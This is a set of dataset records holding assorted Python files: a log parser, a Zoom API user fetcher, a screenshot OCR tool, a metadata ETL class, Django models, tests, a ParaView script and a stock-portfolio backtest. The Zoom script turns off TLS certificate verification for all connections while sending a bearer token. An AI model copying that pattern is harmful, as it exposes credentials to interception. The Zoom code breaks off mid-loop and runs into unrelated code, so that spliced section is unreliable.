area habitable\nmy_lp_problem += Ec <= Tc # Tc = area cultivable del area habitable (hacen overlap)\n\n\nprint(my_lp_problem.solve())\nprint(pulp.LpStatus[my_lp_problem.status])\n\nfor variable in my_lp_problem.variables():\n print(\"{} = {}\".format(variable.name, variable.varValue))\n","sub_path":"Internacional/Solución/Iteraciones Modelos/modelo_complejo3.py","file_name":"modelo_complejo3.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"513513198","text":"import gzip\nimport sys\nfile = \"/Users/roc/Desktop/access1610.log.gz\"\n# file = sys.argv[1]\n\n# It means that r defaults to rb, and if you want text you have to specify it using rt\nwith gzip.open(file, mode='rt', encoding='utf-8') as f:\n for lines in f:\n line = lines.strip().split('\"')\n if line[0].startswith(\"#\") is True:\n continue\n date = line[0].split('\"')\n date = date[0]\n user = line[1]\n srcip = line[2].split(' ')\n srcip = srcip[2]\n\n dstip = line[2].split(' ')\n dstip = dstip[1]\n\n statuscode = line[2].split(' ')\n statuscode = statuscode[3]\n\n method = line[3].split(' ')\n method = method[0]\n\n url = line[3].split(' ')\n url = url[1]\n\n byte = line[10].split(' ')\n c2sbyte = byte[1]\n\n if len(byte) <3:\n s2cbyte = \"\"\n else:\n s2cbyte = byte[2]\n\n print('\"' + date + '\",\"' + user + '\",\"' + srcip + '\",\"' + dstip + '\",\"' + statuscode + '\",\"' + method + '\",\"' + url + '\",\"' + c2sbyte + '\",\"' + s2cbyte + '\"')\n\n","sub_path":"gzip_log.py","file_name":"gzip_log.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"528647804","text":"import http.client\nimport json\nimport time\nimport datetime as dt\nimport ssl\n\n\ndef get_all_users(token):\n\n\n ssl._create_default_https_context = ssl._create_unverified_context\n today = dt.datetime.strftime(dt.datetime.utcnow(),'%Y-%m-%d')\n conn = http.client.HTTPSConnection(\"api.zoom.us\")\n\n headers = {\n 'authorization': \"Bearer %s\" % token ,\n 'content-type': \"application/json\"\n }\n\n conn.request(\"GET\", \"/v2/users?page_number=1&page_size=300&status=active\", headers=headers)\n\n res = conn.getresponse()\n data = res.read()\n\n\n all_data = json.loads(data.decode(\"utf-8\"))\n\n\n page_count = all_data['page_count']\n master_user_list = all_data['users']\n\n print(page_count)\n\n i=2\n while i 2 :\n parameter = re.findall(r'\\d+', realString[2])\n Request['army']['fill_in'] = parameter[0]\n Request['army']['max'] = parameter[1]\n if len(parameter) > 3 :\n Request['spells']['fill_in'] = parameter[2]\n Request['spells']['max'] = parameter[3]\n else :\n Request['spells']['fill_in'] = 0\n Request['spells']['max'] = 0\n\n if len(parameter) > 5 :\n Request['device']['fill_in'] = parameter[4]\n Request['device']['max'] = parameter[5]\n else :\n Request['device']['fill_in'] = 0\n Request['device']['max'] = 0\n Request['position'] = None\n return Request\n\n def getImageRequestList(self, imageName) :\n ''' 返回图片中所有捐赠请求信息 '''\n pendingImage = Image.open(imageName)\n pendingImage = pendingImage.transpose(Image.ROTATE_90)\n pendingImage = pendingImage.crop((0, 100, self.dialogWidth, self.dialogheigth))\n # pendingImage.show()\n # 获得捐赠按钮所在位置\n newImage = self.processImage(pendingImage, lambda x, y, z : not (y > 200 and z < 100))\n buttonPostionList = self.locateDialogBoxList(newImage, 600)\n # for index in buttonPostionList :\n # print(index)\n\n # 获得横线\n newImage = self.processImage(pendingImage, lambda x, y, z : not (y < 50 and z < 50))\n horizontalLineList = self.locateDialogBoxList(newImage, 500)\n # for index in horizontalLineList:\n # print(index)\n\n # 获得按钮所在的单元\n rangList = []\n for index in buttonPostionList :\n i = 0\n while i < len(horizontalLineList) :\n if index[1] < horizontalLineList[i][1] :\n rangList.append(i)\n break\n else :\n i += 1\n if i == len(horizontalLineList) :\n rangList.append(i)\n # for index in rangList:\n # print(index)\n\n # 剪裁按钮所在的位置\n requestList = []\n m = 0\n for index in rangList :\n if index == 0 :\n cellBox = pendingImage.crop((0, 2, 500, horizontalLineList[index][1]))\n elif index == len(horizontalLineList) :\n cellBox = pendingImage.crop((0 , horizontalLineList[index - 1][1] + 84, 500, self.dialogheigth))\n else :\n cellBox = pendingImage.crop((0 , horizontalLineList[index - 1][1] + 84, 500, horizontalLineList[index][1]))\n cellBox = self.processImage(cellBox, lambda x, y, z : x >= 200 and y >= 200 and z >= 200 and abs(x - y) < 3 and abs(x - z) < 3 and abs(y - z) < 3)\n # cellBox.show()\n pendingString = self.m_myOrc.getString(cellBox)\n Request = self.translateStringToRequest(pendingString)\n Request['position'] = buttonPostionList[m]\n m += 1\n requestList.append(Request)\n return requestList\n\n def locateDialogBoxList(self, image, number):\n image = image.convert(\"RGB\")\n pixdata = image.load()\n box_list = []\n y = 0\n x = number\n while y < image.size[1] :\n if pixdata [x, y] == (255, 255, 255) :\n box = (x , y)\n box_list.append(box)\n y += 100\n else :\n y += 1\n return box_list\n\n def pasteImage(self, image) :\n width, height = image.size\n newImage = Image.new('RGB', (width, height), (0, 0, 0))\n newImage.paste(image, (0, 0))\n return newImage\n\n def processImage(self, image, logicExpression) :\n ''' 将图片按照指定算法转化为黑白图片 '''\n newImage = self.pasteImage(image)\n newImage = newImage.convert(\"RGB\")\n pixdata = newImage.load()\n for y in range(newImage.size[1]):\n for x in range(newImage.size[0]):\n if logicExpression(pixdata[x, y][0], pixdata[x, y][1], pixdata[x, y][2]):\n pixdata[x, y] = (0, 0, 0)\n else:\n pixdata[x, y] = (255, 255, 255)\n return newImage\n\n\n\ninstpictureAnalysis = pictureAnalysis()\nprint(instpictureAnalysis.getImageRequestList(os.getcwd() + \"\\\\picture\\\\screenshort.png\"))","sub_path":"pictureAnalysis.py","file_name":"pictureAnalysis.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"112830808","text":"import psycopg2\nimport sys\nimport datetime\nimport json\nimport SQLScript\nimport Metadata\n\nclass MetadataETL:\n #класс по работе с метаданными\n\n @staticmethod\n #вставляет новый объект в метаданные\n #object_type - тип объекта (source, table, column и тд)\n #link_object_id - ключ связываемого объекта (пример: источник - таблица)\n #1 - вставка прошла успешно\n #0 - возникла ошибка\n def InsertObject(object_type, object_attr, link_object=None):\n # object_type - тип объекта\n # object_attr - атрибуты объекта\n # link_object - лист объектов, с которыми требуется связать вставляемый объект\n # {\"link_object_type\":\"тип связываемого объекта\";\"link_object_id\":id связываемого объекта\"}\n result = {}\n error = []\n if object_type == \"table\":\n # проверяем наличие уже созданной таблицы\n table_exst_sql = SQLScript.SQLScript.ObjectNameCheck(object_attr.get(\"table_name\",None), object_type,object_attr.get(\"schema\",None))\n Metadata.Metadata.crsr.execute(table_exst_sql)\n table_exst = Metadata.Metadata.crsr.fetchall()\n if int(table_exst[0][0]) > 0:\n error.clear()\n error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":\"Table already exists\"})\n result.update({\"result\":[{\"result\":None,\"error\":error}]})\n return result\n\n # вычисляем макс. id\n max_id_sql = SQLScript.SQLScript.MaxObjectId(object_type)\n Metadata.Metadata.crsr.execute(max_id_sql)\n max_id = Metadata.Metadata.crsr.fetchall()\n object_id = int(max_id[0][0]) + 1\n\n # запрос на вставку нового id\n insert_object_sql = SQLScript.SQLScript.InsertObject(object_type,object_id)\n\n # запрос на вставку параметров объекта\n insert_obj_prm_sql = SQLScript.SQLScript.InsertObjectAttr(object_type,object_id, object_attr)\n\n # запрос на вставку объекта с другим объектом\n insert_obj_lnk_sql=\"\"\n for lnk_object in link_object:\n # проверка на наличие связанного объекта\n lnk_exst_sql = SQLScript.SQLScript.ObjectCheck(lnk_object.get(\"link_object_id\",None), lnk_object.get(\"link_object_type\",None))\n Metadata.Metadata.crsr.execute(lnk_exst_sql)\n source_exst = Metadata.Metadata.crsr.fetchall()\n if int(source_exst[0][0]) == 0:\n error.clear()\n error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":lnk_object.get(\"link_object_type\",None)+\" isn't found\"})\n result.update({\"result\":[{\"result\":None,\"error\":error}]})\n return result\n\n insert_obj_lnk_sql = insert_obj_lnk_sql + SQLScript.SQLScript.InsertLinkObject(lnk_object.get(\"link_object_type\",None),object_type,lnk_object.get(\"link_object_id\",None),object_id)\n\n # выполняем запрос\n insert_sql = insert_object_sql+insert_obj_prm_sql+insert_obj_lnk_sql\n try:\n Metadata.Metadata.crsr.execute(insert_sql)\n result.clear()\n result.update({\"result\":[{\"result\":\"Success\",\"object_id\":object_id,\"error\":error}]})\n except:\n Metadata.Metadata.crsr.rollback()\n error.clear()\n error.append({\"error_flg\":\"1\",\"error_code\":\"0000151\",\"error_text\":\"Something is wrong\"})\n result.update({\"result\":[{\"result\":None,\"error\":error}]})\n\n return result\n\n @staticmethod\n def UpdateObject(object_type, object_id, change_type, object_attr=None, link_object_id=None):\n #change_type: 1 - изменение атрибута объекта в object_attr (все указанные в массиве атрибуты будут изменены)\n # 2 - изменение связи (должен быть проставлен link_object_id\n result = {}\n error = []\n # ��роверка на наличие объекта\n obj_exst_sql = SQLScript.SQLScript.ObjectCheck(object_id,object_type)\n Metadata.Metadata.crsr.execute(obj_exst_sql)\n obj_exst = Metadata.Metadata.crsr.fetchall()\n if int(obj_exst[0][0]) == 0:\n error.clear()\n error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":object_type+\" isn't found\"})\n result.update({\"result\":[{\"result\":None,\"error\":error}]})\n return result\n upd_obj_sql=\"\"\n if change_type==1:\n del_obj_attr_sql = \"\"\n for obj_attr in object_attr:\n del_obj_attr_sql = del_obj_attr_sql+SQLScript.SQLScript.DeleteObjectAttr(object_type, object_id, obj_attr)\n ins_obj_attr_sql = SQLScript.SQLScript.InsertObjectAttr(object_type,object_id, object_attr)\n upd_obj_sql = del_obj_attr_sql+ins_obj_attr_sql\n if change_type==2:\n link_object_type=\"\"\n if object_type==\"table\":\n link_object_type=\"source\"\n if object_type==\"column\":\n link_object_type=\"table\"\n # проверка на наличие связанного объекта\n lnk_exst_sql = SQLScript.SQLScript.ObjectCheck(link_object_id,link_object_type)\n Metadata.Metadata.crsr.execute(lnk_exst_sql)\n lnk_exst = Metadata.Metadata.crsr.fetchall()\n if int(lnk_exst[0][0]) == 0:\n error.clear()\n error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":link_object_type+\" isn't found\"})\n result.update({\"result\":[{\"result\":None,\"error\":error}]})\n return result\n del_lnk_obj_sql = SQLScript.SQLScript.DeleteAllLinkObject(link_object_type, object_type, object_id)\n ins_lnk_obj_sql = SQLScript.SQLScript.InsertLinkObject(link_object_type,object_type,link_object_id,object_id)\n upd_obj_sql=del_lnk_obj_sql+ins_lnk_obj_sql\n # выполняем запрос\n try:\n Metadata.Metadata.crsr.execute(upd_obj_sql)\n result.clear()\n result.update({\"result\":[{\"result\":\"Succesful\",\"error\":error}]})\n except:\n Metadata.Metadata.crsr.rollback()\n error.clear()\n error.append({\"error_flg\":\"1\",\"error_code\":\"0000151\",\"error_text\":\"Something is wrong\"})\n result.update({\"result\":[{\"result\":None,\"error\":error}]})\n\n return result\n @staticmethod\n def DeleteObject(object_type, object_id):\n # удаление объекта из метаданных (проставление disable_flg)\n result = {}\n error = []\n # проверка на наличие объекта\n obj_exst_sql = SQLScript.SQLScript.ObjectCheck(object_id,object_type)\n Metadata.Metadata.crsr.execute(obj_exst_sql)\n obj_exst = Metadata.Metadata.crsr.fetchall()\n if int(obj_exst[0][0]) == 0:\n error.clear()\n error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":object_type+\" isn't found\"})\n result.update({\"result\":[{\"result\":None,\"error\":error}]})\n return result\n\n del_obj_sql=SQLScript.SQLScript.DeleteObject(object_type, object_id)\n\n del_lnk_obj_sql=\"\"\n if object_type in (\"table\",\"column\"):\n link_object_type=\"\"\n if object_type==\"table\":\n link_object_type=\"source\"\n if object_type==\"column\":\n link_object_type=\"table\"\n del_lnk_obj_sql=SQLScript.SQLScript.DeleteAllLinkObject(link_object_type,object_type, object_id)\n delete_sql=del_obj_sql+del_lnk_obj_sql\n # выполняем запрос\n try:\n Metadata.Metadata.crsr.execute(delete_sql)\n result.clear()\n result.update({\"result\":[{\"result\":\"Succesful\",\"error\":error}]})\n except:\n Metadata.Metadata.crsr.rollback()\n error.clear()\n error.append({\"error_flg\":\"1\",\"error_code\":\"0000151\",\"error_text\":\"Something is wrong\"})\n result.update({\"result\":[{\"result\":None,\"error\":error}]})\n\n return result\n","sub_path":"MetadataETL.py","file_name":"MetadataETL.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"533484510","text":"from django.db import models\nfrom django.contrib.gis.db import models as geomodels\nfrom django.contrib.auth.models import User\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.utils import timezone\n\n\nPRIVACY = [('Private', 'Private'),\n ('Shared', 'Shared'),\n ('Public', 'Public')]\n\n\nclass Face(models.Model):\n name = models.CharField(max_length=128, blank=True, null=True)\n x = models.IntegerField()\n y = models.IntegerField()\n width = models.IntegerField()\n height = models.IntegerField()\n\n\n@python_2_unicode_compatible\nclass Photo(models.Model):\n faces = models.ManyToManyField(Face, related_name='photos', blank=True, null=True)\n file = models.ImageField(upload_to='photo_files/%Y-%m-%d')\n owner = models.ForeignKey(User, null=False, related_name='photos')\n title = models.CharField(max_length=128)\n description = models.TextField(blank=True)\n date_uploaded = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n date_published = models.DateTimeField(auto_now_add=True)\n privacy = models.CharField(max_length=7, choices=PRIVACY, default='Public')\n geom = geomodels.PointField(null=True, blank=True)\n\n def __str__(self):\n return self.title\n\n\n@python_2_unicode_compatible\nclass Album(models.Model):\n photos = models.ManyToManyField(Photo, related_name='photos')\n cover = models.ForeignKey(Photo, related_name='cover', blank=True, null=True)\n owner = models.ForeignKey(User, null=False, related_name='albums')\n title = models.CharField(max_length=128)\n description = models.TextField(blank=True)\n date_uploaded = models.DateTimeField(default=timezone.now)\n date_modified = models.DateTimeField(default=timezone.now)\n date_published = models.DateTimeField(default=timezone.now)\n privacy = models.CharField(max_length=7, choices=PRIVACY, default='Public')\n\n def __str__(self):\n return self.title\n","sub_path":"imagersite/imager_images/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28739263","text":"from app import settings\nfrom tests.integration.integration_test_case import IntegrationTestCase\n\n\nclass TestApplicationVariables(IntegrationTestCase):\n\n def setUp(self):\n settings.EQ_ENABLE_FLASK_DEBUG_TOOLBAR = True\n settings.EQ_DEV_MODE = True\n settings.EQ_ENABLE_LIVE_RELOAD = True\n settings.EQ_UA_ID = 'TestId'\n super().setUp()\n\n def tearDown(self):\n super().tearDown()\n settings.EQ_ENABLE_FLASK_DEBUG_TOOLBAR = False\n settings.EQ_DEV_MODE = False\n settings.EQ_ENABLE_LIVE_RELOAD = False\n settings.EQ_UA_ID = None\n\n def test_flask_toolbar_is_displayed(self):\n self.launchSurvey('0', 'star_wars')\n self.assertStatusOK()\n self.assertInBody('flDebugToolbarHandle')\n\n def test_google_analytics_code_is_present(self):\n self.launchSurvey('0', 'star_wars')\n self.assertStatusOK()\n self.assertInHead('GoogleAnalyticsObject')\n\n def test_livereload_script_rendered(self):\n self.launchSurvey('0', 'star_wars')\n self.assertStatusOK()\n self.assertTrue('__bs_script__' in self.getResponseData())\n","sub_path":"tests/integration/test_application_variables.py","file_name":"test_application_variables.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"63482683","text":"#### import the simple module from the paraview\nfrom paraview.simple import *\nparaview.simple._DisableFirstRenderCameraReset()\n\n# find source\ngaussian_1dxmf = FindSource('gaussian_1d.xmf')\n\n# create a new 'Contour'\ncontour1 = Contour(Input=gaussian_1dxmf)\ncontour1.ContourBy = ['POINTS', 'phi']\ncontour1.Isosurfaces = [0.0]\ncontour1.PointMergeMethod = 'Uniform Binning'\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n# show data in view\ncontour1Display = Show(contour1, renderView1)\n\n# save data\nanimationScene1 = GetAnimationScene()\nnOut = 102\n\nfor i in range(nOut):\n if i < 10:\n str_i = '00' + str(i)\n elif i < 100:\n str_i = '0' + str(i)\n else:\n str_i = str(i)\n #\n import pdb; pdb.set_trace()\n pre_path = '/home/mquezada/Desktop/mql/work/KAUST/shallow_water_periodic_bathymetry/FEM/2D/gaussian/small_domain/post_processing/DATA/data'\n SaveData(pre_path + str_i + '.csv', proxy=contour1)\n animationScene1.GoToNext() \n#\n\n","sub_path":"FEM/2D/gaussian/small_domain/post_processing/export_1d_data_paraview.py","file_name":"export_1d_data_paraview.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"65846747","text":"import datetime\nimport os\nimport gc\nimport time\nfrom time import time, sleep\nimport glob\nimport csaps\nimport itertools\nfrom datetime import datetime, timedelta, date\nfrom pulp import LpProblem, LpVariable, lpSum, LpMaximize, value, LpInteger\nfrom time import time, sleep\nimport pstats\nimport statistics\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport multiprocessing as mp\nimport matplotlib\nfrom matplotlib import rc\nimport plotly\nimport plotly_express\nfrom multiprocessing import Pool\n\n\nmatplotlib.use('TkAgg')\npd.options.mode.chained_assignment = None # default='warn'\n\nprint(\"Number of processors: \", mp.cpu_count())\nos.environ[\"MODIN_ENGINE\"] = \"dask\"\nimport modin.pandas as pd_modin\n\ndef startup():\n matplotlib.use('TkAgg')\n pd.options.mode.chained_assignment = None # default='warn'\n print(\"Number of processors: \", mp.cpu_count())\n exec(open(\"pyESN.py\").read())\n\n\ndef read_data(chunksize):\n cols = ['Ticker', 'Date',\t'Open', 'High', 'Low', 'Close', 'Adj Close', 'Volume']\n full_datas = pd.DataFrame(columns=cols)\n path = '/Users/jasonrubenstein/Desktop/Python/QuantFin1/StockData/*.csv'\n stock_files = glob.glob(path)\n for i in stock_files:\n sd = pd_modin.read_csv(i, chunksize=chunksize,\n iterator=True)\n stock_data = pd_modin.concat(sd, ignore_index=True)\n full_datas = full_datas.append(stock_data, ignore_index=True)\n # sd = pd.read_csv('~/Desktop/Python/QuantFin1/StockData/stock_data2020-03-19.csv',\n # chunksize=chunksize, iterator=True)\n # stock_data = pd.concat(sd, ignore_index=True)\n return full_datas, print(\"Most recent date on file = \" + str(full_datas['Date'].max()) + \"\\n\")\n print(\"Most ancient date on file = \" + str(full_datas['Date'].min()) + \"\\n\")\n\n\nstock_data = read_data(100000)\n\n\nticker_options = 0\nprint(\"Type 1 for Apple and Amazon only, or 0 for all stocks\" + \"\\n\" +\n \"Typing 0 may lead to increased run time on derivative calculations\")\nticker_options = input()\n\n\nif ticker_options == 1:\n stock_data = stock_data[(stock_data['Ticker'] == \"AAPL\") | (stock_data['Ticker'] == \"AMZN\")]\nelse:\n pass\n\n\nclass Adjustments:\n \n def general_fixes(df):\n df.rename(columns={'Adj Close': 'Adj_Close'}, inplace=True)\n df['DateID'] = pd.factorize(df['Date'])[0]\n df['Prev_Close'] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(1)\n df['pct_change'] = 0\n df['pct_change'] = (df['Adj_Close'] - df['Open'])/df['Open'] * 100\n df['Prev_pct_change'] = df.groupby(\"Ticker\")[\"pct_change\"].shift(1)\n df['Prev_volume'] = df.groupby(\"Ticker\")[\"Volume\"].shift(1)\n df[\"Date\"] = pd.to_datetime(df[\"Date\"])\n return df\n\n\n def simple_momentum(df):\n df[\"12_Day_Momentum\"] = 0\n df[\"26_Day_Momentum\"] = 0\n df[\"270_Day_Momentum\"] = 0\n df.loc[:, \"12_Day_Momentum\"] = (\n df.groupby(\"Ticker\")[\"Adj_Close\"].shift(1) / df.groupby(\"Ticker\")[\"Adj_Close\"].shift(\n 12) - 1)\n df.loc[:, \"26_Day_Momentum\"] = (\n df.groupby(\"Ticker\")[\"Adj_Close\"].shift(1) / df.groupby(\"Ticker\")[\"Adj_Close\"].shift(\n 26) - 1)\n df.loc[:, \"270_Day_Momentum\"] = (\n df.groupby(\"Ticker\")[\"Adj_Close\"].shift(1) / df.groupby(\"Ticker\")[\"Adj_Close\"].shift(\n 261) - 1)\n return df\n\n\n def macd(df):\n df['12_day_ema'] = 0\n df['26_day_ema'] = 0\n df['MACD'] = 0\n ema_12 = df.groupby(\"Ticker\").apply(lambda x: x[\"Adj_Close\"].ewm(span=12).mean())\n ema_26 = df.groupby(\"Ticker\").apply(lambda x: x[\"Adj_Close\"].ewm(span=26).mean())\n df[\"12_day_ema\"] = ema_12.reset_index(level=0, drop=True)\n df[\"26_day_ema\"] = ema_26.reset_index(level=0, drop=True)\n df[\"MACD\"] = df[\"12_day_ema\"] - df[\"26_day_ema\"]\n MACD = df.groupby(\"Ticker\").apply(lambda x: x[\"MACD\"].ewm(span=9).mean())\n df[\"MACD\"] = MACD.reset_index(level=0, drop=True)\n return df\n\n\n def twelve_two_month_price(df):\n if df.groupby(\"Ticker\")[\"Adj_Close\"].shift(263) is not None:\n df.loc[:, \"12_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(263)\n elif df.groupby(\"Ticker\")[\"Adj_Close\"].shift(262) is not None:\n df.loc[:, \"12_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(262)\n elif df.groupby(\"Ticker\")[\"Adj_Close\"].shift(261) is not None:\n df.loc[:, \"12_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(261)\n else:\n df.loc[:, \"12_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(260)\n #\n if df.groupby(\"Ticker\")[\"Adj_Close\"].shift(46) is not None:\n df.loc[:, \"2_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(46)\n elif df.groupby(\"Ticker\")[\"Adj_Close\"].shift(45) is not None:\n df.loc[:, \"2_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(45)\n elif df.groupby(\"Ticker\")[\"Adj_Close\"].shift(44) is not None:\n df.loc[:, \"2_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(44)\n else:\n df.loc[:, \"2_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(43)\n df['30_day_12_2_momentum'] = 0\n df['12_2_change'] = (df['2_month_price'] - df['12_month_price']) / df['12_month_price']\n df['12_2_momentum'] = (df['2_month_price'] - df['12_month_price'])\n df.loc[:, \"30_day_12_2_momentum\"] = df.groupby(\"Ticker\")[\"12_2_momentum\"].shift(30)\n # Add buy signal\n df['buy'] = np.where(df['pct_change'] > 0, 1, 0)\n return df\n\n\n\n def mu_pct_change(df):\n ema_pct_change = df.groupby(\"Ticker\").apply(lambda x: x[\"Prev_pct_change\"].ewm(span=100).mean())\n df[\"100_day_µ_pct_change\"] = ema_pct_change.reset_index(level=0, drop=True)\n ema_volume = df.groupby(\"Ticker\").apply(lambda x: x[\"Prev_volume\"].ewm(span=100).mean())\n df[\"100_day_µ_volume\"] = ema_volume.reset_index(level=0, drop=True)\n return df\n\n# Choose whatever indicators you want to use or functions to run\nworking_data_all = Adjustments.general_fixes(stock_data)\nworking_data_all = Adjustments.macd(working_data_all)\n\n###### FUNDS ######\nprint(\"Enter funds constraint (don't make super high since max n-qty of individual stock):\\n\")\nFUNDS = int(input())\n\n###### INDICATOR ######\nprint(\"Choose indicator (MACD, 30_day_12_2_momentum, 100_day_µ_pct_change)?:\\n\")\nINDICATOR = str(input())\n\n###### START DATE ######\nprint(\"Start Date (year * month * day):\\n\")\nSYEAR, SMONTH, SDAY = int(input()), int(input()), int(input())\nsdate = date(SYEAR, SMONTH, SDAY)\n\n###### END DATE ######\nprint(\"End Date (year * month * day):\\n\")\nEYEAR, EMONTH, EDAY = int(input()), int(input()), int(input())\nedate = date(EYEAR, EMONTH, EDAY)\n\ndaterange = pd.date_range(sdate, edate)\ndates_list = list(daterange.strftime(\"%Y-%m-%d\"))\n\n# Memory check\n# for dtype in ['float', 'int', 'object', 'datetime']:\n# selected_dtype = working_df_use.select_dtypes(include=[dtype])\n# mean_usage_b = selected_dtype.memory_usage(deep=True).mean()\n# mean_usage_mb = mean_usage_b / 1024 ** 2\n# print(\"Average memory usage for {} columns: {:03.2f} MB\".format(dtype,mean_usage_mb))\n\n# Russell 1000 stocks only\nruss = pd.read_csv('~/Desktop/Python/QuantFin1/Russell1000Stocks.csv', sep=\",\")\n\nworking_df_use = working_data_all[(working_data_all['Ticker'].isin(russ['Stock']))].reset_index(drop=True)\n\n# Define the dataframe to be appended; run from here\ncols = ['Date', 'DailyGainLoss', 'OpenCost', 'CumulativeGainLoss', 'PosNeg', 'Tickers']\nbook = pd.DataFrame(columns=cols)\n\n# Set iterator k equal to 0\nk = 0\n\n# number of unique dates in dataframe\nunique_dates = len(working_df_use[working_df_use['Date'].isin(dates_list)]['Date'].unique())\n\n\nbad_tickers = [\"TWLO\", \"INVH\", \"VST\", \"FHB\", \"HGV\", \"ARD\"]\n# include only dates in desired range where the indicator is not null\nusable_df = working_df_use[(working_df_use['Date'].isin(dates_list))\n & (pd.notnull(working_df_use[INDICATOR]))\n & (working_df_use['100_day_µ_volume'] > 250000) # volume definition. To add VWMA\n & (~working_df_use['Ticker'].isin(bad_tickers)).reset_index(drop=True)]\n\n# remove unnecessary columns\n# usable_df = usable_df[[\"Ticker\", \"Date\", \"Open\", \"Volume\", \"Adj_Close\",\n# \"pct_change\", \"MACD\", \"30_day_12_2_momentum\"]]\n\nusable_df = usable_df[[\"Ticker\", \"Date\", \"Open\", \"Volume\", \"Adj_Close\",\n \"pct_change\", INDICATOR]]\nprint(len(usable_df))\nprint(len(usable_df['Ticker'].unique()))\n\n# works but time complexity is an issue. It's erratic not necessarily bad\n\nfor i in dates_list:\n usable_df_new = usable_df[~usable_df['Date'].isin(book['Date'])].reset_index(drop=True)\n # if indicator == \"MACD\":\n date_only = usable_df_new[(usable_df_new['Date'] == i)\n & (usable_df_new[INDICATOR] > 0)].reset_index(drop=True)\n data = pd.concat([date_only]*20, ignore_index=True).reset_index(drop=True) # max 20 shares of any individual stock per date\n # data.rename(columns={'index': 'row_id'}, inplace=True)\n # else:\n # date_only = usable_df_new[(usable_df_new['Date'] == i)\n # & (usable_df_new[indicator] > 0)].reset_index(drop=True)\n # data = pd.concat([date_only]*5, ignore_index=True).reset_index()\n if not data.empty:\n start_time = time()\n ticker, open_price, pct_change, metric = data['Ticker'], data['Open'], data['pct_change'], data[INDICATOR]\n # open_price = data['Open']\n # pct_change = data['pct_change']\n # row_id = data['row_id']\n # metric = data[indicator]\n P = range(len(ticker))\n # add in funds determinant based upon prior few days % return (if bunch of negatives invest less of funds)\n if len(book) < 10:\n book['FundSignal'] = 0\n else:\n book['FundSignal'] = book.PosNeg.rolling(window=10).mean().sort_index(level=1).values\n # book['FundSignal'].fillna(0, inplace=True)\n if len(book) < 1:\n S = float(FUNDS)\n elif len(book) > 9 and abs(book.FundSignal.iat[-1]) > float(0.5):\n # use half of funds available\n # book['FundSignal'].fillna(0, inplace=True)\n S = (float(FUNDS) + float(book.CumulativeGainLoss.iat[-1]))*.5\n else:\n S = float(FUNDS)+float(book.CumulativeGainLoss.iat[-1])\n\n # Moving average of last few days book, with binary pos/neg. (e.g. if µ last 5 days < -.6, use half of available capital)\n prob = LpProblem(\"Optimal_Portfolio\", LpMaximize)\n x = LpVariable.matrix(\"x\", list(P), 0, 1, LpInteger)\n prob += sum(metric[p] * x[p] for p in P)\n prob += sum(open_price[p] * x[p] for p in P) <= S\n prob.solve()\n open_price = [open_price[p] for p in P if x[p].varValue]\n ticker = [ticker[p] for p in P if x[p].varValue]\n pct_change = [pct_change[p] / 100 for p in P if x[p].varValue]\n # pct_change = [x / 100 for x in pct_change]\n gain_loss = [a * b for a, b in zip(open_price, pct_change)]\n total_yield, total_open_price = np.sum(gain_loss), np.sum(open_price)\n ticker = np.array(ticker)\n # total_open_price = np.sum(open_price)\n # dates, gains, cost = set(), set(), set()\n # dates.add(i)\n # gains.add(total_yield)\n # cost.add(total_open_price)\n # gc.disable()\n book = book.append({\n 'Date': i,\n 'DailyGainLoss': total_yield,\n 'OpenCost': total_open_price,\n 'Tickers': np.unique(ticker)\n },\n ignore_index=True)\n # book['Tickers'] = book.apply(lambda r: tuple(r), axis=1).apply(ticker)\n book['CumulativeGainLoss'] = book['DailyGainLoss'].cumsum()\n book['PosNeg'] = np.where(book['DailyGainLoss'] < -10,\n -1,\n 0)\n end_time = time()\n k += 1\n elapsed_time = float(end_time - start_time)\n print('{} out of {} dates optimized in {} seconds'.format(k, unique_dates, round(elapsed_time, 2)))\n print(date_only.loc[date_only[INDICATOR].idxmax()])\n print(date_only.loc[date_only['pct_change'].idxmax()])\n # print('{} out of {} dates optimized in {} seconds'.format(k, unique_dates, round(elapsed_time, 2)))\n\n if elapsed_time > 10:\n try:\n sleep(15)\n gc.collect()\n continue\n except AttributeError:\n print(\"time.sleep attribute error occurred, passing over sleep func.\")\n gc.collect()\n continue\n else:\n continue\n else:\n pass\n\n# end run\n\n\nfig = plotly_express.line(book, x=\"Date\", y=\"CumulativeGainLoss\")\nfig.show()\n\nbook = book.fillna(0)\nprint(\"Total Return From {} to {} = \".format(sdate, edate) + 